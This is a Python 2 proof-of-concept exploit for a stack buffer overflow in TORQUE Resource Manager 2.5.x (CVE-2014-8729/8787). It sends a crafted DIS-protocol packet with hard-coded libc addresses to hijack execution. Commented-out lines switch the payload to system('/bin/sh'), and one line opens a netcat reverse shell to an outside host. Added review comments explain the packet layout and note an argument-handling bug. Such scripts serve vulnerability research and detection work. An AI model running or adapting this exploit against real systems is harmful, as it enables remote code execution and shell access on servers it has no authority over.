#!/usr/bin/env python
# Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow
# Date: 10 Nov 2014
# Exploit Author: @inso - Moussajee Thomas, @socks - Laurenceau Gary
# Vulnerability discovered by: Moussajee Thomas, Laurenceau Gary
# CVE: CVE-2014-8729, CVE-2014-8787
# Vendor Homepage: http://www.adaptivecomputing.com/
# Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
# Version tested: 2.5.12
# Version affected : 2.5.x - 2.5.13
# Tested on: Debian 32bit with ASLR disabled
# ROP on exit(42) with control of EAX register
# can be customised (uncomment the marked lines) for reverse shellcode execution if NX is disabled
import socket
import sys
import struct
def off(o):
    """Pack the integer *o* into 4 bytes using the native byte order ('I')."""
    packer = struct.Struct('I')
    return packer.pack(o)
plt = {
    # Hard-coded libc addresses for the tested Debian 32-bit build with ASLR
    # disabled (see header); off() packs each into 4 native-endian bytes.
    # Only 'exit' is used unless the commented-out lines further down are
    # changed.
    'exit' : off(0xb7dd8270),
    'system': off(0xb7de4c30),
}
# Target selection from the command line: "ip port", "ip", or built-in
# defaults.
# NOTE(review): the second test is a plain `if`, not `elif`, so with three
# arguments the `else` branch still runs and resets ip/port to the defaults;
# sys.argv[2] is also kept as a str here, not converted to an int.
if (len(sys.argv) == 3):
    ip = sys.argv[1]
    port = sys.argv[2]
if (len(sys.argv) == 2):
    ip = sys.argv[1]
    port = 15001
else:
    ip = "192.168.211.145"
    port = 15001
# Plain TCP connection to the target port.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
offset = 143 # number to read
# Header as built here: digit count of `offset`, then `offset`, then '1'
# -> "31431" (5 bytes) for offset = 143. The trailing comment identifies
# this as TORQUE's DIS framing.
header = str(len(str(offset))) + str(offset) + '1' #header dis protocol torque
packet = header
packet += 'c' * 60 # padding
# Python 2 only: struct.pack() returns a str here, so the packed address
# concatenates directly with the text padding (the print statements below
# confirm the Python 2 target).
packet += plt['exit'] # set EIP to exit() address (comment out for /bin/sh execution); address may differ, check with `print exit` in gdb
#packet += plt['system'] # set EIP to system() address (uncoment for bin/sh execution) may diffear print system on gdb
packet += 'a' * 4 # padding
packet += chr(42) # set EAX to 42 '*' (comment out for /bin/sh execution)
# #packet += ('\xb4\x5f\xee\xb7') # set EAX on "/bin/sh" address on libc (uncoment for bin/sh execution) may diffear find [system address], +999999999999, "/bin/sh" on gdb
#packet += (0x8bd5930 + (len(packet) + 1 - len(header)) # EAX on buffer address + 68 for set at "netcat"
#packet = 'nc -e /bin/sh 192.168.1.19 1337' + '\x00' # reverse shell and set null at the end of the string
# Fill to a fixed 148-byte total: 5-byte header + 60 x 'c' + 4-byte address
# + 4 x 'a' + '*' = 74 bytes, so 74 bytes of 'b' follow.
packet += 'b' * (148 - len(packet)) # padding (comment out for /bin/sh execution)
# Wire layout of what is sent: a DIS-style length header followed by long
# runs of a single repeated byte and a constant total size. Those runs and
# the fixed length are the observable characteristics of this payload on
# the network.
print "sending buffer to " + ip + ':' + str(port)
print "size : " + str(len(packet)) # 148 if offset = 143
#print packet.encode("hex")
s.sendall(packet)
s.close()